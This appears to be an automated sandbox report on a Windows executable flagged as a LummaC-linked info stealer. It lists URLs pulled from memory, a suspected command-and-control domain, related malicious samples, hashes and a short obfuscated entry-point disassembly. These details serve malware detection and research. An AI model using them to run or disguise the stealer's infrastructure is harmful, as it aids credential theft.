                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/recaptcha/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://checkout.steampowered.com/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lev-tolstoi.com/n#ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/;ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://store.steampowered.com/about/ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://help.steampowered.com/en/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/market/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/news/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://lev-tolstoi.com/apiN#ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://lev-tolstoi.com/rsF#ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://lev-tolstoi.com/apimji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://lev-tolstoi.com/apixji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://steamcommunity.com/discussions/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/stats/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://lev-tolstoi.com:443/api2ji2xlo1f.exe, 00000001.00000002.2584910256.0000000001672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://medal.tvji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://x1.c.lencr.org/0ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://x1.i.lencr.org/0ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
URL: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
  Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
  Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: https://steamcommunity.com/workshop/
  Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: https://login.steampowered.com/
  Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: https://support.mozilla.org/products/firefoxgro.all
  Source: ji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

URL: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
  Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp; ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
[Map legend: No. of IPs < 25% | 25% < No. of IPs < 50% | 50% < No. of IPs < 75% | 75% < No. of IPs]

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577533
Start date and time: 2024-12-18 15:16:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ji2xlo1f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.198.119.143, 92.122.16.236, 20.190.181.0, 20.223.36.55, 13.107.246.63, 2.16.158.185, 4.175.87.197, 150.171.28.10, 20.74.19.45, 2.16.158.243, 20.223.35.26
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
• Execution Graph export aborted for target ji2xlo1f.exe, PID 4176 because there are no executed functions
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ji2xlo1f.exe
Time | Type | Description
09:17:35 | API Interceptor | 13x Sleep call for process: ji2xlo1f.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.66.86 | MV ROCKET_PDA.exe | malicious | FormBook
• www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106 | Armanivenntii_crypted_EASY.exe | malicious | LummaC
 | aqbjn3fl.exe | malicious | LummaC
 | aqbjn3fl.exe | malicious | LummaC
 | zq6a1iqg.exe | malicious | LummaC Stealer
 | v_dolg.exe | malicious | LummaC Stealer
 | cccc2.exe | malicious | LummaC
 | CompleteStudio.exe | malicious | LummaC
 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar
 | alexshlu.exe | malicious | LummaC Stealer
 | 99awhy8l.exe | malicious | LummaC
Match | Associated Sample Name / URL | Detection | Threat Name | Context
lev-tolstoi.com | Armanivenntii_crypted_EASY.exe | malicious | LummaC
• 172.67.157.254
 | aqbjn3fl.exe | malicious | LummaC
• 172.67.157.254
 | aqbjn3fl.exe | malicious | LummaC
• 172.67.157.254
 | v_dolg.exe | malicious | LummaC Stealer
• 172.67.157.254
 | CompleteStudio.exe | malicious | LummaC
• 104.21.66.86
 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar
• 172.67.157.254
 | alexshlu.exe | malicious | LummaC Stealer
• 172.67.157.254
 | 5_6253708004881862888.exe | malicious | LummaC
• 104.21.66.86
 | 1fxm3u0d.exe | malicious | LummaC
• 104.21.66.86
 | 2kudv4ea.exe | malicious | LummaC
• 104.21.66.86
bg.microsoft.map.fastly.net | Order_948575494759.xls | malicious | Unknown
• 199.232.214.172
 | DocuStream_Scan_l8obgs3v.pdf | malicious | HTMLPhisher
• 199.232.214.172
 | stail.exe.3.exe | malicious | Socks5Systemz
• 199.232.214.172
 | 22TxDBB1.bat | malicious | Unknown
• 199.232.214.172
 | sxVHUOSqVC.exe | malicious | Unknown
• 199.232.210.172
 | pyld611114.exe | malicious | Unknown
• 199.232.210.172
 | Lu4421.exe | malicious | AsyncRAT, DcRat, Stealerium
• 199.232.214.172
 | do.ps1 | malicious | Unknown
• 199.232.214.172
 | Opdxdyeul.exe | malicious | SystemBC
• 199.232.210.172
 | YcxjdYUKIb.exe | malicious | PureCrypter, PureLog Stealer
• 199.232.210.172
steamcommunity.com | f86nrrc6.exe | malicious | LummaC
• 104.102.49.254
 | Armanivenntii_crypted_EASY.exe | malicious | LummaC
• 23.55.153.106
 | aqbjn3fl.exe | malicious | LummaC
• 23.55.153.106
 | aqbjn3fl.exe | malicious | LummaC
• 23.55.153.106
 | zq6a1iqg.exe | malicious | LummaC Stealer
• 23.55.153.106
 | v_dolg.exe | malicious | LummaC Stealer
• 23.55.153.106
 | cccc2.exe | malicious | LummaC
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | Armanivenntii_crypted_EASY.exe | malicious | LummaC | 23.55.153.106
 | aqbjn3fl.exe | malicious | LummaC | 23.55.153.106
 | aqbjn3fl.exe | malicious | LummaC | 23.55.153.106
 | http://www.mynylgbs.com | malicious | Unknown | 23.195.38.175
 | loligang.ppc.elf | malicious | Mirai | 96.17.102.118
 | zq6a1iqg.exe | malicious | LummaC Stealer | 23.55.153.106
 | v_dolg.exe | malicious | LummaC Stealer | 23.55.153.106
 | cccc2.exe | malicious | LummaC | 23.55.153.106
 | CompleteStudio.exe | malicious | LummaC | 23.55.153.106
 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 23.55.153.106
CLOUDFLARENETUS | https://heyzine.com/flip-book/f976862c0c.html | malicious | Unknown | 172.67.73.205
 | H3G7Xu6gih.exe | malicious | RHADAMANTHYS | 162.159.61.3
 | HI6VIJERUn.exe | malicious | RHADAMANTHYS | 162.159.61.3
 | DocuStream_Scan_l8obgs3v.pdf | malicious | HTMLPhisher | 104.18.95.41
 | Armanivenntii_crypted_EASY.exe | malicious | LummaC | 172.67.157.254
 | random.exe.2.exe | malicious | LummaC | 104.21.64.80
 | aqbjn3fl.exe | malicious | LummaC | 172.67.157.254
 | aqbjn3fl.exe | malicious | LummaC | 172.67.157.254
 | https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossing | malicious | Unknown | 162.159.140.147
 | goldlummaa.exe | malicious | LummaC | 104.21.50.161
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | f86nrrc6.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | Armanivenntii_crypted_EASY.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | random.exe.2.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | aqbjn3fl.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | aqbjn3fl.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | goldlummaa.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.21.66.86, 23.55.153.106
 | InstallSetup.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | ScreenUpdateSync.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
 | random.exe.10.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.865628370184908
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ji2xlo1f.exe
File size: 6'289'408 bytes
MD5: 9f8ca917737b3233abb943edc065659c
SHA1: ea6df1e154c02f0089c8f3c4b3acc69c01d30774
SHA256: cd4061786081eb01aa278dfff5adca5a80d827e456719e40d06f3dc9353bed22
SHA512: 2ffbab3c1b8518a4a2f75a20dd475949ad326adbe34b7f20d47840ec925b60af886839f55fd8360297bf573e2590b268091822b6c6daf1d349476cdef68c3780
SSDEEP: 98304:aqg9irR/fRdwlaqteBNHi9efT/VwE6S2miOaRDbSXBwI+tycngWhV7nITfse33Jo:aqgO/fR6peBnDVwXuSDCiTxDV7ITfXS
TLSH: 7456238B1A9B40EAD8C414B09317BAF713F2ADE64C860C377AC574CE74B2EB56167907
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....3%g.............................IP...........@...................................`...@..................................b?....
Icon Hash: 0d01070e0b8ec70f
Entrypoint: 0x9049e0
Entrypoint Section: .vmp
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67253391 [Fri Nov 1 20:01:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 6db65226fe38c2add317799e31764bfe
Instruction
  push 031B931Dh
  pushfd
  sub dword ptr [esp+04h], 8E9C018Bh
  not byte ptr [esp+04h]
  mov word ptr [esp+04h], CEA6h
  call 00007FE32D4A8BFCh
  call 00007FE32D149720h
  loope 00007FE32D1D6BEAh
  sub ah, byte ptr [edx-00C1EAC3h]
  adc ah, cl
  lea edx, dword ptr [27D2FF3Eh]
  std
  jns 00007FE32D1D6BD2h
  sbb byte ptr [ebx], 0000004Fh
  jbe 00007FE32D1D6C8Dh
  mov al, FFFFFFF0h
  fucomi st(0), st(2)
  rol dword ptr [eax], 44h
  push eax
  mov ebp, edx
  rol dword ptr [eax], FFFFFF94h
  ror byte ptr [ebx-16h], FFFFFFC1h
  add byte ptr [edi+edi*2], bl
  jns 00007FE32D1D6BE6h
  xor edi, edi
  haddps xmm7, xmm7
  adc dword ptr [ecx-718BB24Dh], esp
  nop
  pop ebp
  mov eax, 3A8BC736h
  dec ebx
  push ebx
  jbe 00007FE32D1D6C11h
  pop esp
  push ebp
  jnl 00007FE32D1D6BEFh
  leave
  push B5E7FF78h
  inc ebp
  xor dword ptr [eax+78h], ebp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3f62d4 | 0xa0 | .vmp
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8f9000 | 0x64fbb | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8f8000 | 0x6a8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
